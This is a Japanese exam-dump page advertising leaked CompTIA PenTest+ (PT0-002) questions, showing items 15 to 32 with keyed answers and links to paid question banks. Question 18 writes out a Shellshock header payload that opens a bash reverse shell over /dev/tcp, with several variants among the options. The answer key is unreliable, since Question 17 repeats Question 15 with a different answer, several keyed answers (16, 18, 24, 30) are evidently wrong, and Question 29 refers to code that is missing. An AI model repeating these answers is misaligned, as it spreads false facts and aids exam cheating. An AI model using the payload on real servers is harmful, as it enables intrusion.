• ホーム
  • ブログ
  • PT0-002PDFで合格させるスゴ問題集でPT0-002最新のリアル試験問題 [Q15-Q32]

PT0-002PDFで合格させるスゴ問題集でPT0-002最新のリアル試験問題 [Q15-Q32]

Share

PT0-002PDFで合格させるスゴ問題集でPT0-002最新のリアル試験問題

有効なPT0-002テスト解答PT0-002試験PDF問題を試そう

質問 15
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

  • A. Nmap
  • B. tcpdump
  • C. Scapy
  • D. hping3

正解: C

解説:
Explanation
https://0xbharath.github.io/art-of-packet-crafting-with-scapy/scapy/creating_packets/index.html

 

質問 16
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

  • A. To remove a reverse shell from the system
  • B. To remove the tester-created Mimikatz account
  • C. To remove tools from the server
  • D. To remove hash-cracking registry entries

正解: B

 

質問 17
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

  • A. Nmap
  • B. tcpdump
  • C. Scapy
  • D. hping3

正解: A

 

質問 18
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • D. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

正解: A

 

質問 19
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

  • A. Run nmap with the --script vulners option set against the target
  • B. Run nmap with the -sA option set against the target
  • C. Run nmap with the -sV and -p22 options set against the target
  • D. Run nmap with the -o, -p22, and -sC options set against the target

正解: C

 

質問 20
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

  • A. PLCs will not act upon commands injected over the network.
  • B. Supervisory systems will detect a malicious injection of code/commands.
  • C. Supervisors and controllers are on a separate virtual network by default.
  • D. Controllers will not validate the origin of commands.

正解: D

 

質問 21
A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company's web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

  • A. Shodan results
  • B. Externally facing open ports
  • C. IP addresses and subdomains
  • D. DNS forward and reverse lookups
  • E. Zone transfers
  • F. Internet search engines

正解: C,E

 

質問 22
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

  • A. MSA
  • B. SLA
  • C. ROE
  • D. NDA

正解: D

 

質問 23
A compliance-based penetration test is primarily concerned with:

  • A. obtaining Pll from the protected network.
  • B. obtaining specific information from the protected network.
  • C. bypassing protection on edge devices.
  • D. determining the efficacy of a specific set of security standards.

正解: D

 

質問 24
A consultant is reviewing the following output after reports of intermittent connectivity issues:
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet] Which of the following is MOST likely to be reported by the consultant?

  • A. An ARP flooding attack is using the broadcast address to perform DDoS.
  • B. A multicast session was initiated using the wrong multicast group.
  • C. A device on the network has poisoned the ARP cache.
  • D. A device on the network has an IP address in the wrong subnet.

正解: B

 

質問 25
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

  • A. The existence of default passwords
  • B. Susceptibility to DDoS attacks
  • C. Inability to network
  • D. Unsupported operating systems

正解: D

 

質問 26
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

  • A. Apple
  • B. Android
  • C. Windows
  • D. Linux

正解: C

 

質問 27
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:
* Connected to 10.2.11.144 (::1) port 80 (#0)
> GET /readmine.html HTTP/1.1
> Host: 10.2.11.144
> User-Agent: curl/7.67.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Date: Tue, 02 Feb 2021 21:46:47 GMT
< Server: Apache/2.4.41 (Debian)
< Content-Length: 317
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WordPress &#8250; ReadMe</title>
<link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" />
</head>
Which of the following tools would be BEST for the penetration tester to use to explore this site further?

  • A. DirBuster
  • B. Burp Suite
  • C. OWASP ZAP
  • D. WPScan

正解: B

 

質問 28
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity.
Which of the following is the MOST important action to take before starting this type of assessment?

  • A. Determine if the failover environment relies on resources not owned by the client.
  • B. Establish communication and escalation procedures with the client.
  • C. Verify the client has granted network access to the hot site.
  • D. Ensure the client has signed the SOW.

正解: D

 

質問 29
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

  • A. Burp Suite and DIRB
  • B. Nmap and OWASP ZAP
  • C. Netcat and cURL
  • D. Hydra and crunch

正解: A

 

質問 30
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

  • A. Tag nesting
  • B. Meta tagging
  • C. RFID tagging
  • D. RFID cloning

正解: B

 

質問 31
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.
Which of the following best describes the NEXT step in the engagement?

  • A. Attestation of findings and delivery of the report
  • B. Scheduling of follow-up actions and retesting
  • C. Acceptance by the client and sign-off on the final report
  • D. Review of the lessons learned during the engagement

正解: C

 

質問 32
......

PT0-002問題集はあなたの合格を必ず保証します:https://www.goshiken.com/CompTIA/PT0-002-mondaishu.html

PT0-002テスト問題集とオンライン試験エンジン:https://drive.google.com/open?id=1DPaJ7JtaMgcHIQq0772pDt7PLCtzojWy

関するブログ

もっと
PT0-002無料問題集